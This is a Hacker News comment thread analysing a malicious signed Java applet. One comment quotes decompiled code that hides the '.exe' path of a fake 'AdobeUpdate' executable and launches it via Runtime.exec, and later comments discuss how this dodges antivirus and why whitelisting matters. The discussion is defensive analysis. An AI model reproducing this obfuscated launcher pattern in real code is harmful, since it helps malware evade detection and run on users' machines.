Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

It's a long time since I went anywhere near Java (let alone an applet) - but these lines don't look very nice:

  String str2 = System.getenv("APPDATA");
  String str5 = str2 + "\\";
  String str6 = "AdobeUpdate-Setup1.84##e";
  String str9 = str5.concat(str6.replace("##", ".ex"));     
  Runtime.getRuntime().exec(str9);


From a quick glance it would appear it tries to execute:

C:\Users\<username>\AppData\Roaming\AdobeUpdate-Setup1.84.exe

Just appears to be a rudimentary attempt at obfuscating the executable path.

The question is, how come the JVM is allowing Runtime.getRuntime().exec() to be called.


According to an up thread commenter, it's digitally signed which allows a prompt to the user for elevated permissions.


An evil wee signed applet.


I think thats done to fool AV software. - AV software will probably flag up any string which equals "AdobeUpdate-Setup1.exe"


All AV software is about that dumb as far as I know. Anyone who is depending on AV software to protect things like actual money is in serious trouble.


You can't really expect it to do much more in this case, you can make the computation which results in ".exe" arbitrarily complex, and detection needs to be cheap. Ultimately the problem is that AV software is in the business of enumerating badness. You need to do whitelisting, for example of who gets to execute arbitrary code, which is the problem here.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: